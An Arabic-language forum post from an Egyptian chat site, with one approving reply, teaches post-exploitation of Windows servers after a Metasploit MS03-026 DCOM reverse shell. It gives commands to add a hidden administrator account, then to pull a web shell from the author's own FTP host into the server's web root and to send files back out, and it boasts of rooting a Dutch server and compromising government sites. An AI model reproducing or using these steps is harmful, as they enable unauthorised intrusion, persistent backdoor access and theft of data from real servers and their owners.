شات قصة حب - شات بنات مصر شات مصرية
اهلا وسهلا بكم فى منتدى وشات قصة حب يرحب بكم
اذا كنت تود ان تكون عضواُ فى قصة حب والانضمام لاسترتنه المتوضعه فمرحباُ بـــك ،،،
تحياااااتى ســـمــــا و tyamoo

شات قصة حب - شات بنات مصر شات مصرية

منتدى قصة حب , شات بنات مصر , شات حب للابد , حب للابد , بنات مصر , شات حبنا , شات 12 , شات مصرية , شات حلا , شات كلامنجى , شات شعبي , شات هاى
 
الرئيسيةقصة الحبمكتبة الصوربحـثالتسجيلدخولمركز تحميل قصة حب

شاطر | 
 

 شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر .اهداء من العاصفة

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
التنين الاسود
المدير العام
المدير العام
avatar

ذكر الثور الماعز
عدد الرسائل : 51
العمر : 26
البلد : طنطا
الوظيفه : هكرز
الاوسمة : التعاون
نقاط : 5539
تاريخ التسجيل : 13/07/2010

مُساهمةموضوع: شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر .اهداء من العاصفة   الأربعاء يوليو 14, 2010 4:10 am


ابدا موضوعي باسم الله الرحمن الرحيم واصلي واسلم علي اشرف الخلق اجمعين
سيدنا محمد النبي الامي ومن اتبعه باخلاص الي يوم الدين . أما بعد .
===================================

M e t a Sploit Project
هذا الاسم الذي لطالما مر علي الكثيرين ممن يتصفحون الانترنت سواء في مجال
القرصنه او غيره
ما هو مشروع
الميتا

سبلويت
وفيما يستخدم ؟؟

بدأ مشروع ثغرات M e t a sploit في عام 2003 تقريبا
بالطبع وكما هو معروف ان اي مشروع او اداه يتم طرحها علي الشبكه العنكبوتيه
تكون سلاح ذو حدين وكل شخص يستخدمها علي حسب رؤيته وعقليته

فاداة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
يمكن استخدامها في مجال الحمايه وكذا في مجال الاختراق
اما في مجال الاختراق فان الثغرات المطروحه في مشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] يتم
بها اختراق السرفرات

او اجهزة الحواسيب الالكترونيه او يتم بها مهاجمة انظمة التشغيل ومتصفحات
الانترنت
واما الحمايه فمن الماكد ان ارباب البرامج التي تم طرح ثغراتها في البرنامج
لن يقفو مكتوفي الايدي

فطالما عرفت الثغره فبالاكيد عرف الترقيع وهذا يضمن لهم امان اكثر
لمشاريعهم الي ان يتم اكتشاف ثغره اخري ربما تهدد نظامهم الأمني
حسنا ما هي أخطر ثغرات هذا المشروع ؟

لا شك في ان اي ثغره تم طرحها في مشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هي
ثغرة بمثابة 0-day يعني ثغره قاتله

ولاكن اخطر الثغرات التي مرت بمشروع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] كانت
ثغرة msrpc_dcom_ms03_026
وكان أحد أخطر استخداماتها هو في انشاء مستخدم جديد علي السرفر يملك نفس
صلاحية مدير النظام

والتي راح ضحيتها عشرات وربما مئات السرفرات الحكوميه في انحاء العالم وكان
لجمهورية الصين نصيب الاسد في المواقع الحكوميه التي تم الاطاحه بها

فاذكر انا ما يقرب من 91% من المواقع الحكوميه الصينيه تعمل علي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ويندوز
وما يقرب من نسبة 78% من المواقع الحكوميه في العالم يعمل علي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ويندوز وهذا الكلام عن تجربه شخصيه واحصائيه ليست بالتخمينيه ,

ولاكن الاصدارات المصابه بهذه الثغره كانت IIS4 , IIS5
اما الاصدار السادس وما بعده فلا تعمل عليهم الثغره علي حسب ذكر المصدر من
شركة ميكروفت
وعلي حسب اعتقادي فان اول من كان يستخدم تلك الثغره هم الفريق الامريكي
PoisonBox

وهذا الكلام علي حسب ذكر الهكرز الصينين في الحرب الالكترونيه التي تمت بين
الدولتين في عام 2001
اوووف اعذروني فلدي الكثير لاقوله في هذا المجال ولاكني لا احب ان اطيل
اكثر من ذلك وسابدا بالسرد باذن الله

بالنسبه لثغرة msrpc_dcom_ms03_026 فمنذ ان تم طرحها فما من شخص قام بشرحها
الا قام بشرح كيفية استخدامها في انشاء حساب جديد علي السرفر بصلاحيات
المدير

ومن شرح استخدامها في [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لم
يقم سوي بالتصال بالدوس ويقول اكملو انتم ؟؟
ولاكن ماذا بعد
الاتصال
بموجه الاوامر الخاص [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ؟؟

هذا هو موضوع اليوم باذن الله لكي يكون هذا الموضوع مختصر عن [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الاصدار الثاني
والموضوع القادم سيكون عن الاصدار الثالث وساطرح ثغرات خاصه باذن الله
حسنا رابط تحميل الاداه الاصدار 2.7 :


كود PHP:




http://file12.9q9q.net/Download/15152612/framework-2.7.rar.html








طبعا حتي لا يطول الموضوع فقد تم شرح الاداه اكثر من مره وتم شرح
استخدامها

حسنا بعد تثبيت الاداه وفتح الـ MsConsol تفعل الآتي :



طبعا الأمر واضح فهو لاستخدام ثغرة msrpc_dcom :

كود PHP:




use msrpc_dcom_ms03_026








طبعا الثغره تم شرحها من قبل كثيرا جدا جداوانا مش بحب احكي في
المحكي وحفاظا علي قوانين المنتدي مش هكتب روابط للموضوع بس تقدرو تبحثو
عنو في جوجل ,

المهم ندخل في الاساس بعد ما طبقت الثغره واتصلت عكسي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واصبح موجه الأوامر الخاص بالجهاز مفتوح اموالدتك فماذا تفعل ؟

(( ملحوظه موجه الاوامر هو الدوس (doc) وهي اختصار (disk operating system)
وطبعا نفس الاسم معروفه به ثغرات الدوس doc ولاكن هذه الثانيه تعني
(denial of service) والتي تعني حجب الخدمه )

حسنا نعود الي الموضوع الرئيسي وهذه صورة من الدوس الخاص بالجهاز الذي قمت
بالاتصال
العكسي
به وهو سرفر هولندي علي كل حال :

بالفعل كما تلمحون في الصورة بالاعلي فان الذي طبقت منه الاوامر هو :


كود PHP:




C : D o c u m e n t s and Settings hima








ولاكن هذا طبعا لا يعني انني اطبق علي جهازي الشخصي وهذا واضح من نفس
الصورة فقط كل ما في الامر انني قمت بعمل اشرح بعدما قمت بترويت السرفر
واليوزر هو اسمي وليس هناك غرابه في ذلك ... ,

الآن ماذا تفعل بعدما قمت بالاتصال [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ؟؟

فلنفرض انك تريد ترويت السرفر ؟؟ بسيطه تقوم بتطبيق الأمر :


كود PHP:




net user virus_hima paswd /add








طبعا تستبدل virus_hima باليوزر الذي تختاره و paswd بالباسورد الذي
تريده

ثم :

كود PHP:




net localgroup administrators virus_hima /add








الآن قمت بأضافة اليوزر الي قآئمة المديرين للنظام وأصبحت تملك
الصلاحيه للتحكم
الكامل

بالسرفر




والآن تستطيع الإتصال [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] عن
طريق الريموت ديسك توب ويصبح الجهاز تحت تحكمك

ولاكن لنكن واقعيين أكثر فمعظم السرفرات يحجب تنفيذ الأمر net user وأتباعه
من

كود PHP:




net user usr pwd /add >> etc








فهل نترك السرفر ونخرج ؟ بالطبع لا ,
فلنفرض انك تريد رفع شل علي جهاز السرفر لتتحكم في مواقعه مثلا طالما طاحت
مننا حيلتنا الاولي
فالأمر بسيط بإذن الله . .

في البدايه لابد يكون معاك سي بنل بتاع اي موقع حتي اذا مساحه مجانيه مش
مشكله المهم يكون معاك بيانات الاف تي بي لماذا ؟

لاننا سنقوم بالاتصال بالـ ftp الخاص بمساحتنا عن طريق الدوس وسحب ملف الشل الي مسار الموقع علي السرفر
ومن ثم استعراضه من المتصفح والتمتع بالإختراق .

في البدآيه نقوم بالتنقل الي المسار الموجود به المواقع علي السرفر طبعا
التنقل يكون عن طريق الأمر

كود PHP:




cd








واستعراض الملفات يكون عن طريق الأمر :

كود PHP:




dir








ولا تنسي انك تستخدم الدوس يعني في [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] مش
لينوكس بيكون :


كود PHP:




cd & ls -la








حسنا بالنسبه لي فالمسار هاهنا :

كود PHP:




C: Inetpub wwwroot









حسنا الآن نكتب الأمر :

كود PHP:




ftp open








وستون النتيجه :

كود PHP:




C:D o c u m e n t s and Settings hima>ftp open

Unknown host open
.

ftp>








ثــــــــــــــــــــم :

كما تشاهدون في الصوة بالاعلي نكتب الأمر :

كود PHP:




open vhima.110mb.com








ثم سيطلب منك اليوزر وبعدها الباسورد والان انت متصل بالسي بنل الخاص
بك من الدوس

والان من الاف تي بي ترفع شل علي مساحتك الخاصه ثم تقوم بسحبه علي السرفر
في المسار

الذي حددته في البدايه والذي يحوي موقع السرفر ثم تشغله من المتصفح ,, تآبع
:


الآن تم والحمد لله سحب الشل علي السرفر وتسطيع استدعائه من المتصفح وتفعل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ما
تشاء باذن الله

طبعا لا احد يقولي ممكن نخترق الاجهزه اللي تحت الشبكه والكلام ده لانه
معروف في اجهزه السرفر بيكون الايبي الخاص بها اي بي ستاتيك يعني ثابت

مش معقول بيكون جهاز سرفر بيشيل مواقع وهيروح ياجر وصلة نت من واحد جنبهم
:p

طبعا بالنسبه للسحب والارسال فاذا اردت سحب ملف من موقعك الي جهاز السرفر
تستخدم الأمر :

كود PHP:




get file.whatever








كما هو واضح في الصورة بالاعلي , اما اذا اردت ارسال ملف من جهاز
السرفر الي الافتبي الخاص بك
لسحبه علي جهازك مثلا فتستخدم الأمر :


كود PHP:




send file.whatever








طبعا whatever هي الإمتداد >> e.g >> txt,exe,gif
وطبعا نفس الطريقه لها استخدامات اخري ولاكن اترككم تتعاملون معها كل علي
هواه :p
والآن تم الشرح بحمد الله وأتمني ان يكون شرحا كافيا وافيا من الاخطاء
خاليا . . .
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
sama_mylove
نائب المدير
نائب المدير
avatar

انثى الجوزاء الماعز
عدد الرسائل : 171
العمر : 26
البلد : egypt
الاوسمة : على طول
نقاط : 6800
تاريخ التسجيل : 17/01/2009

مُساهمةموضوع: رد: شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر .اهداء من العاصفة   الأربعاء يوليو 14, 2010 5:47 am

مشكورة جدان على هذا الموضوع الاكثر من رائع
يا تنين وبجد نستفيد منك اكثر واكثر وننتظر منك المزيد
لـــك تحياتى study Laughing
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر .اهداء من العاصفة
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
شات قصة حب - شات بنات مصر شات مصرية :: قــــــــــــــســــــــــم البــــــــــرامــــــــــــــــــــــــــج :: مملكة امن المواقع والشبكات-
انتقل الى: